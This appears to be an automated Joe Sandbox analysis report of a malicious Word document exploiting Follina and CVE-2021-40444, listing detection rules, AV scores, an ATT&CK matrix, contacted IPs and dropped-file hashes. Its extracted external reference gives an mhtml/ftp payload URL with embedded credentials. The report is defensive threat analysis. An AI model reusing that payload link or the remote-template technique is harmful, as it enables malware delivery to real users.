Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18

Source: v4nkfHg4d9.doc	ReversingLabs: Detection: 24%
Source: v4nkfHg4d9.doc	Virustotal: Detection: 37%

Source: v4nkfHg4d9.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\v4nkfHg4d9.doc

Source: v4nkfHg4d9.doc

OLE indicator, Word Document stream: true

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$nkfHg4d9.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6AC3.tmp

Jump to behavior

Source: classification engine

Classification label: mal92.expl.evad.winDOC@1/17@1/1

Source: v4nkfHg4d9.doc	OLE document summary: title field not present or empty
Source: v4nkfHg4d9.doc	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: v4nkfHg4d9.doc

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: mhtml:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html!x-usc:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Exploitation for Client Execution	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 File and Directory Discovery	Remote Services	Data from Local System	1 Exfiltration Over Alternative Protocol	1 Non-Standard Port	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	1 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	11 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
v4nkfHg4d9.doc	24%	ReversingLabs	Document-Office.Exploit.CVE-2021-40444
v4nkfHg4d9.doc	38%	Virustotal		Browse
v4nkfHg4d9.doc	100%	Avira	HEUR/CVE-2021-40444.Gen

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html	100%	Avira	JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html	100%	Avira	JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html	100%	Avira	JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html	100%	Avira	JS/CVE-2022-30190.G

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ftpupload.net	8%	Virustotal		Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ftpupload.net	185.27.134.11	true	true	8%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.27.134.11	ftpupload.net	United Kingdom		34119	WILDCARD-ASWildcardUKLimitedGB	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	706117
Start date and time:	2022-09-20 12:01:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	v4nkfHg4d9.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.expl.evad.winDOC@1/17@1/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size getting too big, too many NtQueryAttributesFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.27.134.11	Bewerbung.docx	Get hash	malicious	Browse
	Bewerbung.docx	Get hash	malicious	Browse
	9t3UoeIMi6.exe	Get hash	malicious	Browse
	oUw0Yf51fU.exe	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
WILDCARD-ASWildcardUKLimitedGB	Bewerbung.docx	Get hash	malicious	Browse	185.27.134.11
	Bewerbung.docx	Get hash	malicious	Browse	185.27.134.11
	QUOTATION-648737.exe	Get hash	malicious	Browse	185.27.134.213
	REQUEST FOR QUOTE (SUPPLIES).exe	Get hash	malicious	Browse	185.27.134.33
	d.vbs	Get hash	malicious	Browse	185.27.133.14
	Nuevo orden_________________.PDF.vbs	Get hash	malicious	Browse	185.27.133.14
	neueva ordesdfdsfdfn009.pdf.vbs	Get hash	malicious	Browse	185.27.133.14
	Medicat_Installer.bat	Get hash	malicious	Browse	31.22.4.101
	Maersk Bill of Lading, Packing List and Commercial Invoice_pdf.vbs	Get hash	malicious	Browse	185.27.134.102
	SWIFT MT103.vbs	Get hash	malicious	Browse	185.27.134.102
	Purchase Order Pricelist & Samples.vbs	Get hash	malicious	Browse	185.27.134.102
	Original Bill of Lading, Packing List and Commercial Invoice .vbs	Get hash	malicious	Browse	185.27.134.102
	SWIFT COPY & ADVICE.vbs	Get hash	malicious	Browse	185.27.134.102
	PO#2022CTV05-47.exe	Get hash	malicious	Browse	185.27.134.102
	Unclear Proforma Invoice.vbs	Get hash	malicious	Browse	185.27.134.153
	EMPLOYEE BENEFITS.html	Get hash	malicious	Browse	31.22.4.93
	poUlN2PnnD	Get hash	malicious	Browse	82.163.179.155
	Smqw34mNlm	Get hash	malicious	Browse	82.163.179.146
	Signed Agreement.html	Get hash	malicious	Browse	31.22.4.93
	9t3UoeIMi6.exe	Get hash	malicious	Browse	185.27.134.11

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.28751929512551705
Encrypted:	false
SSDEEP:	96:KTL9HXA6UpXS9Qz/3Skwll6S919It919InH:o+W63Xwll/GlGH
MD5:	A727C052A38A7C763B0785526ED1B7E3
SHA1:	1F514A52E24467E821012B63946BEDC97E8AAD12
SHA-256:	BBB2F36AD0F51F64C42464A98F234029360B21B4311A0D9EA4023761D420464A
SHA-512:	16BFC123F23CC45D8C8D81643D8FBD4C6F8C8AA363397DFEA4464FCD8D1FEC23D4D6C77CEE7938E0E61C5893EB2E0C14A7E45B4B195D5615662B5207E97DE5EB
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z......K....\q..S,...X.F...Fa.q............................F6V...BK.e.f7.w.........?.#..hmI.vR~.9Z..A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{54DDC164-6977-4037-8CE0-7B33C8A8D8B0}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.67186940405612
Encrypted:	false
SSDEEP:	96:KnCy03dnrUA9k16eCYrFoGl57sskQskfDcjteIs66d+seU+seOv+seA+se:k0tnARsxGl+Ust2G/bj
MD5:	B74B882A7C46E06F3B86F790784D4740
SHA1:	DEF77CAA5E9C7990736C5D9B550E00F42949DF4E
SHA-256:	7F1956BADEBB62F2FD77E64E3C4DFDB1974905995B692A2D8D9C192A4429B21A
SHA-512:	284F70D070E53176E949D89E89EFA3FFC570152C192A75E42C4C032EC5A4FD70F3BBEF7D9CB20691568B2EE3CED46426C05EFA7DC22119E3D7EA535D2B95FE79
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z2.[x..M..l.../.S,...X.F...Fa.q...............................bo..F.]e,..A..........t.....C..,.8.bb.S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.961797847617582
Encrypted:	false
SSDEEP:	3:yVlgsRlzqhlKKtacaqSalSgPILW82L10jl276:yPblzuK0acHSJi8JZ22
MD5:	E232829DF073F686551349641EEBD8F4
SHA1:	6A1E938BBFA2D6F1B1D6BE995DF084FA51B4A010
SHA-256:	C19042A7992FF203C5379CFA25A637008B29FD15D8C2497D05E3412F3E9C48FC
SHA-512:	DB9929F0DE0C73B8D7D6080BCAD545EF1C0A223A182FAC773CF870C6D02723238A62442B1F7CC03E02208DDBC149CA804D0A7C17FB0B2C3899FEA61A895CDFFC
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.5.4.D.D.C.1.6.4.-.6.9.7.7.-.4.0.3.7.-.8.C.E.0.-.7.B.3.3.C.8.A.8.D.8.B.0.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.28766421715530094
Encrypted:	false
SSDEEP:	48:I3nQQ2RBx+UuDijr9UdjAo29jpHEYsydHFHKdQHHrIHNIYh7bbTLYKmN19gCc/ER:KsLMi+26hOH
MD5:	924923199F7CCC8A48ED70C554C4A338
SHA1:	8C754C1F80F1F7C0B0B307D6E0D19BD294942AA6
SHA-256:	D4327CD44C91AE99D24507E21253AB462E1A04F72E70ADB03F96B07852757352
SHA-512:	4CC5E79736F614AC3414211ED6DBE96BAD7CBA722C6396121B0B13FE07EABB74BA30EDCEC46D7FE20FD38F1A11ACCF447A212F697BC6B58B765CCE04AC00CAC5
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z)....n@.:GJn...S,...X.F...Fa.q.............................<....N....[...........d.qR..@.Z..w.S..A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{1657AA85-2CA3-4A47-A452-C920236DEB83}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.22092018959874407
Encrypted:	false
SSDEEP:	48:I3xaC/TUrBFw6ljMEljYwoMElR8XNRwy//pTk:Kxr7CFwoMEljYfMElzT
MD5:	6E59514B7DB74AD1BF8E7B0763337037
SHA1:	998B465BB422FA8E46BB6F5F5DC4AED7F5AF6292
SHA-256:	2586FE3FEC8B42F79C2327E0C3CCD46E3BADA6FC548FB1125AC8CBA35D646CB9
SHA-512:	24593F8D3E2699859A4F568DF26E568E8D7603F7BA34F050E12BA81A938EC806CE81A2DFA819CFA514F48703FD7A366C1C2AC8C1955F4BCEE81EF2E0EFA43329
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.......O.....S<.S,...X.F...Fa.q.............................e....mI...Q`(............JoF.N....e.uP>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...\|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.996885566915828
Encrypted:	false
SSDEEP:	3:yVlgsRlzIKlSls8KSN0sXaYIaDwCNPXMlilECjl276:yPblz9IapSSajFclilEg22
MD5:	57103CCAC28859AEB2D05CF5C8F90FA7
SHA1:	3DDB59D6C50F9F696E5F67F59498607BBCE12C9D
SHA-256:	5F8058A4F381EA14D0C80CC3F25B15E433AA58D9DEA92050A467CA5B1584F74D
SHA-512:	0D7E6CFCC2311B341F76242B865333FF3DA5CD9C1313DFC0B78AF876354C4217988E53989B4B78E75085679D27AB770E8484C98FADF56FA542FBBB521C7A1FA5
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.1.6.5.7.A.A.8.5.-.2.C.A.3.-.4.A.4.7.-.A.4.5.2.-.C.9.2.0.2.3.6.D.E.B.8.3.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	6827
Entropy (8bit):	1.4956688509182383
Encrypted:	false
